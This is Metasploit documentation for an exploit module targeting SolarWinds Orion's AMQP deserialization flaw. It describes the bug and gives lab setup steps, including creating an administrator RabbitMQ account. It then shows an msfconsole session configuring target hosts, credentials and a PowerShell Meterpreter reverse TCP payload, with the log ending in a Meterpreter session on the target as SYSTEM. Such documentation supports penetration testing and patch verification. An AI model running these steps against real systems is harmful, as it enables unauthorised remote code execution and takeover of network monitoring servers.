ContextQMD
Back to Metasploit Framework

Solarwinds Amqp Deserialization

documentation/modules/exploit/windows/misc/solarwinds_amqp_deserialization.md

6.4.1312.5 KB
Original Source

Vulnerable Application

The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

Verification Steps

  1. Install the application (tested SolarWindows Orion NPM versions 2020.2.5 and 2020.2.6)
    1. After installation is complete, create an AMQP account so you know the credentials. The default account is orion.
    2. Open a command prompt in C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>
    3. Run: .\rabbitmqctl.bat add_user "hax" "Password1!"
    4. Run: .\rabbitmqctl.bat set_permissions hax .* .* .*
    5. Run: .\rabbitmqctl.bat set_user_tags hax administrator
  2. Start msfconsole
  3. Do: use exploit/windows/misc/solarwinds_amqp_deserialization
  4. Set the RHOSTS, USERNAME, PASSWORD, PAYLOAD and payload related-options
  5. Do: run
  6. You should get a shell.

Options

Scenarios

SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64

msf > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400

meterpreter >